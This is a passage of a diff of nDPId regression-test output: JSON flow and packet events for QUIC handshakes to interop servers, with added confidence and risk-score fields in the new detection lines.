xpDc+5DzcXLzyMz+du5WiB2vEQ=="}
-00838{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434569,"flow_last_seen":1603816434569,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434569,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":34511,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"pandora.cm.in.tum.de","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434569,"flow_last_seen":1603816434569,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434569,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":34511,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"pandora.cm.in.tum.de","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434582,"flow_last_seen":1603816434582,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434582,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":51887,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1603816434582,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434582,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAoSJAAEARNaLAqAGAM55pYsqvAbsE7MzswgoKCgoIEaz1Ap+9VxAAAETSW+W4muYv+Ex5TDdhGEEgn\/uAu0qlojP\/J9hIDPqzwz+JlTXFPtSI+aiI+wxPcULAye6UrinGUUzBJN9cIkelzrXiONFE9BjSvgDnaRECpumembikZ2HAk2TZWGNiHThAH4BNmcORyySVZrHBrWfpgdT2X+HBd1V9EwlFlpGOWc1WMXNhMkNYXVupHdH7xVbTBo5OLCElubCjSPLQcYjGtGeLSII96GmgvBOPIrvVPJlrK82HF20a9nNNukdp4BPXnL8I2t+rb0dK\/ghu8TRSa3A+cCR\/8rWbZqaii1OpbuZnQ1EcUrceIDrLKjGsVgpT38KpctLTQ\/LEEVi9cgfwkd28yGJ\/sRbZDa9nN\/DCQk\/CQdVd36eB9jrAYsgu00NdXaK8a13Lde68fZxyZAQpIVnvcfH2Id0GXqqN8JhGEanp74gRCpI27i8iPAmsd3UMjsAW4\/kdVXe3S7CJE2WY0tiD\/+JDxJcFk5llcTgkntKqmYbhPxvEadncEKOIQWKyGQzjDvwSwmig63\/L5G76ukNd5cXQMQN9y+ZTvw7kwrdSXrlmPNlCnkDTwHvC5AJ3k2x4xqqQ\/iNrJ0ZPKJa+ZbSaagf+oOqskwf4MMNjZMwfufWkri43N+eDbtXKbCXPhtUVj407PdHTmzDQCEhc\/2YUIpKa27K6uS7hywCslRzTmpBr7JTDvB08\/wQc36h91hA\/Pk+QFTxQ3jSb17rPzZignHJ8+ktxWDlqgmNhirOBTFHrKKKxFfj7Zd\/VdS2hwqNZRHNiT\/rt9McdxnGuTtU3Je9EyeeJmZRmMe\/caGlDh5g04pl8F7+Oo1btWtTbgaTib8s1bb7OqyePGSaVywbgEE2DT8hSkw\/0V9rX3HxqWWKlm3Q6KLMIO4x9UT+hK9EjaTbVO3sb7ntSBtUvWM69geB7FjBtVEq\/e9xSbiiqRGEZN8fX\/2BZdK\/e7OiNqVv+75BROBKhr8CroCTuIcvBAJsteqOP53Z29BgiPdg5qdLysu2zuT3+eDoL1SSxZ3XRR5bynYqVXOHT9L+i9E\/4kNKasvWdlomwsUZBUHLlgPk6bGw4Ne65krgmZRjBxl36YGLw6+sfkjJoh7npwlPGVTMi0to4OLfQHhGF0beq1Uwve8Fq1vubD4YPVoyRUfwB7pZiGZlefHURnSMLZuwlS26beylIwMqP26dsDx7\/clmOwL44sg6\/0wzyXIpZINxypwBzbjs9d0tlnjJXwUYRy9QmD0slTxEyxrjpBtheiCMc4Cn\/6vmy83GYsYqAPaHjYm5Lm9bkw2mDchmuHIE33cyYUc9fwTe495DLrhWVEzAWbCKPviregmjAsH4m0iA+u4W5k31m1AmJpuBDrgjPUcXL4i82zhjeL+h12K6gteHYqwX7EOPhQ+bRm3SKhW2iyandNBDGKMy2kYZB+kl96lTKXHy42WcNsjGKMfUP9vZVhz0rZo8wSdI7knLcO6jiMKqrsnoCOre5s3EnkzOjTGJOpVTbDAlyOIrVY0\/12bwxq500zdJS7Tqi8Od4Mv0jxABBtbfjE3S4PoXY6OYUNPBVH\/C3Jt3XbMm8PyemuOM8gg2u\/LJT60w1swKGZ4faRilJPXx5ej4jCKtVtArI1E1I5haUgoGSnYETrYiEWQ=="}
-00832{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434582,"flow_last_seen":1603816434582,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434582,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":51887,"dst_port":443,"l4_proto":"udp","ndpi": {"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.seemann.io","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434582,"flow_last_seen":1603816434582,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434582,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":51887,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.seemann.io","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434584,"flow_last_seen":1603816434584,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434584,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":43475,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02140{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1603816434584,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434584,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAXS5AAEARruTAqAGAEr1U9anTEVEE7CkgygoKCgoI3rE9GgKLpyEAAETS2D6FRkK87MNUIcKb45nDQXK7RIhN5jovTQDmFSK2M6QiVZpJOUYoJlkltsOnfd\/1F6U4IQkpFe+m1uV4F6oBz4RBkNPAAuUUBMdDtca4r1A9a73h9DF0dBCYcXkZBvDtL9wCuog66vADNiZMmDEEKyoT8ED6s88IFRXJtbENfR6cs0sHtB4WxRNwLE2yoS5jEYyQtDPhxoDW6y1RUStChGv8HnP3XMM2t\/jLHE+oLZ20Uei8+UFfPk0e8A5VrXwIo9k4jCJsPG1mMTDbv0YDgoPfvTmJTVTIw4QonxYS\/rk7SadZEeONmPaR6TtoWts1FnzUvtWOpV+5Dad83KsfG90X\/CIt\/vwYmyVKvj4VgDM6Pr4H+Uc\/bvz0KjdGW3xm9YMUTlsbI5ol2Pfvu52tXEEWdRjKK8g6DND8ZlC7aMVgSCICn0NKoRloC6NcE8Rw5LJBhOhPXDDbCt20z0FHuqxH9Vx85YXc89Y9JZS\/xEo6rLepUNAZyK4VZC62QFOzsGL6Lx8wSrVduZKsiJBZ4c3ThpGGJ+vaMWABr4\/cWq95Q7ZzLSuvRsXOk+j1He6DsUvm3J+RmjmrwYFgt\/M4CICjBS0Fm10ECgKhrWwd3J2E54DK4DKQ3EUyd3bjdTDHFVk2++CCDGOxGq+7NMa3RFtYVeMobAS4ZjFwkv3BS0m0bobUjHhoVD1GCqa6cx2A4+lBUsOhUXvuodo95jKqOaTXUqsvEaXzN3L7b43PXMpLAq+LaQ7Vzd1FgcpeaZ20BnyGL81mPGhvhcnQeusPeZeeqS6zV1B7OHOYc65wKxzUbYn1EC28EGygmnjZWc0jy2pYGDmTX7nQGQSjnYxGUcUGQPhaCfOeI1ggQvzjjmgpCyBH7XX3wXAV\/IVyilSo0omRqkl\/bMhBxO5UlcQB3HAXvh7\/CW9oHeT1wKQ3fB\/HEa9yU72ZB7d6KVeVKjZq17j4ybQ\/1ggtHYGp2pcGrXZzRwYjOkAZ0Opiy89watoyLGRmGLgTFsDl3McdaMNDx+9v81zsdMOm7BtAMYT6tRwsjrRofdkZ0fVa+YwJIBwtAhT8ajDn7UeBBPGRi94tJDcKF6j4s8my9KviboSu2mxdTOGQO7LtRIaKMRxlUFMtCi42onUa0qPaP+\/X0ttI9DVmM3lXTbZz7zAPwnKTDbrTvlsXFf+fb69MdPyK+0ZKLVzYuN6Rage1Taxjdnuj4OAM\/zUBa3m3soYXUIDBjkGYI3RorjKOgin\/VL4DsoJChrJPR888h8Xk\/IbBDawgJWzXLfoKqwSjYoA5BJLar1\/dem1\/5+HxdBDknyqV+PU2P2vYp8hNcb6mnUzN837UGUuA4NsueZUnc6zYaSL6DRRgrjjKhF6Tz\/MDuOVmRVnM76clbdBfnFUZ6P1n46WbYwkc\/I8+JIV6\/IqS+DjXGRm3N0QevTA6r\/68gEOcX6irDxw4FjiTMIU+OFUnGh6WsbCgi8K5SeV1kRKBmc\/TSum+LmX9s3PKC6cu25aK8beNwOxmv\/gY54CIgRosYlyDeYbWJdPZtKjt0TZLq4wV7HN+8OtqvsSQLBG9tsFDIGXLerkJmoKCBPMmTv62Jjm9BtEc0eZuVqDPUnoU+YqxHdkhj9bAhq0W1dwrlRBuS8N9Rw=="}
-00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434584,"flow_last_seen":1603816434584,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434584,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":43475,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"fb.mvfst.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+01008{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434584,"flow_last_seen":1603816434584,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434584,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":43475,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"fb.mvfst.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434585,"flow_last_seen":1603816434585,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434585,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":49151,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1603816434585,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"ts_msec":1603816434585,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAgstAAEARnBLAqAGAhfLO9L\/\/EVEE7M7UxwoKCgoIFbSGVwPjC1AAAETSjkROzIIp8CK\/caOuFZYAfK1aOEqO4JwTw9D7z+uUbIBTx\/XH4yTcUJ1GJ5nL+Agpz8kkGqy7oh35jkjpRQSyzT2NyzB2NTBiZzOgYyNio+jROASCrTsvFc3Z7POk+A3z6nh\/zFa0LHBvwlp+McgWNFYpnLkD+S13ugMu2uizXqCPOTgA3G6sIsESNefWZzgDU6TE0Fie6rZUHLpsGk6\/rXINEPxgL\/9wq34N4qUhpvbCKjEq66pMlprpty+OzFobGyzV+ZfKcjfk9heS8\/Ktv46aaw96hlXnUfPZHMbA+CWsmthusRBP+K8uIWlnTbdNz9Rfn\/rIR1WmSXPxGkt7FVroGfbPWNtXVz4++NucTI\/gHddPWrZHVTxmD4eDZ+gEpCk9qXs4vIQRkuhhDT7KtsO5OQlx0LGSyxQmka20y1oOk5gC3euqSWQvmM8esR3UL4VI1v9ztMr8LjMn0OiMu95CEowBICOANwFprI0fObMHGsulwe5nvslar15BxrnmzEPNZiHa\/I2lrJGnez3fp4uBPMNgkQPccWwS7tSftVUqukoIkaMMDDugrSYQ99AP2nblRffqf3JA4AsmJuPW0X7qs\/Byp3V6ceyok7YXbgcjlYcvQaIYY\/lxFpek3Nn6KNssLG1fs0ok3z4gezAdPzCDxhvWVe5HYAr1IFeRj3nq\/RPsEA6C4W+4l7Yb2Q+t\/rGxDvAreWu6lw7r0fJV+s3RVQJy+tEW28PRfLsTsQmCiDcS3zHb84scMnkwv5bvftQiTHPxbXfuzIT64fpwltpQEBi3fJ3wBTXCGnFFnw7Nsf4\/JCCbl8lJDqInzgCs+\/Y\/bv7BFYE5WwvyQhhVAkY54ihB2e1U2DYdn7Zqiluxkz6gTqo9t0goC9XZwhqTLhcNfKD0XB23eFaY3KoEPWuPes1Ne6OhOBQfjbGBHAapLo8KpRyV6yba5+B3oKegQAyfeyrNROon4pshqrtlR67NkthaTNhbaMWzCPQYQ69NKAHv4GZAavtCgzoyw0xfFk74LvRxAfWd5OtjPWFSoU9lQ+1mdU\/bOKC6O4VAOilWKe6QbrEStrVui1p\/aQNyqAYvjHwGeocuQw5Apru2zL4CCg9jzkD4KS\/jN+UCk46yLdkn5Ubz2Y\/4Tqj5walihAnanr74XvviJcs00s6SbGZQRIQnGnA5QboJY2HvdZJa5px5WoWlaAtRNSjKOb8VqvcsOTB2gm51ybY2P8hwH3e8MTnT6NSTQUYxd9MKuGbtBlaY4If+PpqrBCmLTLCDHV17kk1VWuNwxmBudJ5goE4YQONWMQUK3S3Ul6LG6ZXlHy88HhO5x8L0R8jS+WOFGP6zSoYvhB8OXq99sB9qjRABZmtgMm6tlllhZ6+KyV6yl0udz2oNhS2Hk09RxStU8\/YuG1qMWFdf1q4PbwgPZ\/SEU8YEQ\/gK\/b3lzjqtkntdDToIJ29938u4+Oea0Z6Ovn9IPTGyjlhkBTrCdjCsinWeEj2Cr6kqLjEOPd09mljIQf3aovLDbm2AUoZWafgLqoeW0JnEY2b\/2gwE5NpGc2iu38L1nWR8EcAN\/w88hux95l3UfaGjHKlj3FFO34BXqnrmch2I8X4qZ\/Xqx0WznIwTUj71m8E95Pb58bFksDsyDw=="}
-00892{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434585,"flow_last_seen":1603816434585,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434585,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":49151,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"h2o.examp1e.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+01001{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434585,"flow_last_seen":1603816434585,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816434585,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":49151,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"h2o.examp1e.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00641{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434586,"flow_last_seen":1603816434586,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434586,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":39945,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1603816434586,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434586,"pkt":"pJGxgjQ5PKn0qB\/sht1gDM4pBNgRQCABCwcKydWupNP+R2kegH0qBdAYDOmBAM0q4v2zvsWrnAkRUQTYkaDFCgoKCghrDAA38OgwkgAARL4V7fWqJD97ugGiMo3hEbsI2+6\/SpwaiwHfJYhBwe8nlBeC2wTuSe5rZV7amDM9N\/ui5SRbMnMa4jgRbgv6T7FxocLh78\/\/47xNpYbQ5OnVlvNw6YvcG6V3D9lglGS7SGlN5I9EKjcJ6eJNC\/yHA+fna1KNRS6W4dCmPZfMeeRKhPbnKLP\/zD\/hQ9u8WpY9sQzK7DxdC06QgW5OFPLciatcrURwr8u743b7gflxyjWj2XMTb8+OZThPj0RJwH3mLn1aP+ys3uq61x1VUHQw18JbP+jOhfjr5+O\/DOmynEaj9yDtlT8pCQmkvZjKW+qGdVHgPAjMhELPJZM+CKVtQWm40oviKQmQrLioe2xR08VjBsCQ33vDOtlEGlAArjadOrMBFc2+XUcBiGRd32aXmUR89tCzI1B+GouNtIblHFiotduRGiNABGg+3Qc29eltQIl3PdSG\/mv6xeCbqRlmFNb1hZDT0EPrntyPIWcXzd7I6R9yH\/OcuERuArM+R4UUu7HVGq3VOIpyJl\/8vVA0PxAitJPE3y7Z8KBR5Uk9ypmv2LBTFbQqleqxK9NsAkl7SzAMl4vTV6UfLWkE4v+lvbSNEQ+7\/h05HZdmM+ow0IuI\/BgPpOsDVtV1aa5VzDkkk9VWQdMUFySvpiE3OHVn9TUuuM9z5aYjx1qv5iZjNaxwGxQ2y+LC+sSOXYRfbtK34ZuCzCSfwzTrrGUTngeMOBfoZ0Xj\/ocEK17WUvslg9MAtjR1Gt3CBgVFOL0OMDBH4AMY+AhGxe0SgGsm9XvIgfhBa9vjDgpW2bJ0dEWPHP5qrAgfuKrrDizOESiLnlVMmMFXOgizTrGewuj0m\/x9ORClQAI0lFK+zVYRJsDUDjl8s8kMpL4rhzj3idhtdVWCdH8wFTr8WuyJ56hOdItfnc01ZNE8WReW4m6xZikAeggNMeWiKtQq+jfhT6qhFmDdif53uwIz3lMDO2crL14B2fVYDgPMUN05glordSj1PZRZS0OPJgjhG1Hs262PpADEzmqa1d8PWOn7489KV\/wKRhTXTO8HK3lkd68JU4rMEIXRiF4qH\/eZSGMgWSgdLEk9Ag7IV4F4aQpdDeOkRKGB\/bEnoIBfiBauwiLbdlgdD\/c47VmgQoRcvQk5GsUx0U0+wFCL\/ZkzcmI3DYCHTfNkG2aEAA+xvCWzWICgkMC5+W19MUzCoMuKizeg1ma9CdQgrL4sjg3iELKoYVCphaaL\/n3OYJYWvTTKTbT6OOq7SWtEDlUmidq13+s7Sl3Yj+afjtbetPkC\/8CAhhTxZQSPMQ1Ni1uSCgMYa8Y4VkddiZbjqAaSZzKfWrctUQrKqIadtSGNHtMQqjpEIWiMo8o\/UgBofbs5Kg3B8jC+JxO7Ld\/FGGhuabdGKUSF\/ZtUgLnPcGEW5kKFktT1D6fxQMfKzarearkPRdC9eF2UogCyGsrOxI\/GFB3vpOggGgWFiIo78PmOU0twqHHZC0t0srjfWKBrf\/fzPkN55ufN73EVurA0pU1TeEWhtid5II3hk9ekWAYMe+fHTtyW461m2tjhK9mczMG6wWszN2qKL3rLagh+IX9s8CJGYkrmfOhgpW1AdBPHq6OvvD7s1\/95DBb3hQ=="}
-00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434586,"flow_last_seen":1603816434586,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434586,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":39945,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.aiortc.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
+01048{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434586,"flow_last_seen":1603816434586,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434586,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":39945,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.aiortc.org","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}}
 00636{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434586,"flow_last_seen":1603816434586,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816434586,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":39624,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02140{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1603816434586,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"ts_msec":1603816434586,"pkt":"pJGxgjQ5PKn0qB\/sht1gAlC2BNgRQCABCwcKydWupNP+R2kegH0gARnwAAUMIVQAAf\/+MzuWmsgBuwTYjDrICgoKCgjzgkejWnQFTwAARL7AEcGzrGiFbLDVVitPMjpX6T6us8klH0LZdsk33gK4kca790hWc9lEqiHw2zuG3cvmTx4edwCefhx9uVFQHbwCX7OdVaAKALQsTDf2esUnZnHqAVwqfHs0alGH87lg8LOQYMLCyJ5o4796Hi54oLNHvp1iBOlawAP1QQwkOrhTac81Z\/3lqw5txy4fqI2ulRUcc8HMVbAvriqgCRBafLPQysmCOVqjinACocPdi0ZP1pUx0qn0+kKcTF+7gFuANdSw5ZrXDF5v6YKUxiJ6vSw8Hy7vrpHpUiN+5fprlESKduOvuve2w8S0Rn1T\/QCLnqgsvW4zVX2obPqKMBoLM0FaRFm0tupv3jD2B